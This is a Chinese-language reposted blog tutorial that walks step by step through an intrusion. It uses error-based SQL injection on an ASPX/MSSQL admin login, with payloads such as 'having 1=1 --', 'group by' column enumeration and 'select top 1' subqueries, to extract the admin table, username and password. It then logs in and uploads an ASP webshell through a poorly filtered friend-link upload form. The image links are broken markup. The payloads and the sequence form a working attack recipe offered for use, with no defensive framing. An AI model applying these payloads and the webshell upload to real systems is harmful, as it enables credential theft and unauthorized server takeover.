aspx+mssql后台登陆注入拿webshell

admin

转载备份

首先测试一下是否可以注入：
[/url]

可以看到，已经出错了：
[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s14.sinaimg.cn/orignal/7fe448c7gdf333d565fed]


接下来利用 这个语句：a' having 1=1 --  爆出字段名：


[/url]


[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s15.sinaimg.cn/orignal/7fe448c7gdf334a5454fe]



可以看到已经爆出表名和字段名了：AdminUser.AdminId,再用

'group by AdminUser.AdminId having 1=1 --爆出其他字段
[/url]

用户名字段已经爆出来了：AdminUser.UserName
再用 'group by AdminUser.AdminId,AdminUser.UserName having 1=1 --爆出密码字段：AdminUser.PassWord 如下图

[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s14.sinaimg.cn/orignal/7fe448c7gdf33502470fd]


字段名都爆出来了，接下来就可以来爆出用户名和密码了
用 ' and (select top 1 AdminUser.UserName from AdminUser )>0 -- 爆出用户名如下：

[/url]


再用：' and (select top 1 AdminUser.PassWord from AdminUser )>0 -- 爆出密码如下：
[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s14.sinaimg.cn/orignal/7fe448c7gdf3377f1bcbd]

这样，账号密码就到手了，直接登录后台
[/url]

找到可以上传的地方，我这里是在友情链接》添加友情链接
[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s13.sinaimg.cn/orignal/7fe448c7gdf338039ab9c]

[/url]
我这里是上传一个asp大马，看到了吧，过滤不严，可以直接上传，添加成功，看一下马儿的路径：

[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s16.sinaimg.cn/orignal/7fe448c7gdf33812ec20f]

复制路径到游览器打开，打开就可以看到可以的马儿了。

[/url]

[url=http://photo.blog.sina.com.cn/showpic.html#blogid=7fe448c70101f36u&url=http://s8.sinaimg.cn/orignal/7fe448c7gdf338243e907]


这样，webshell就到手了。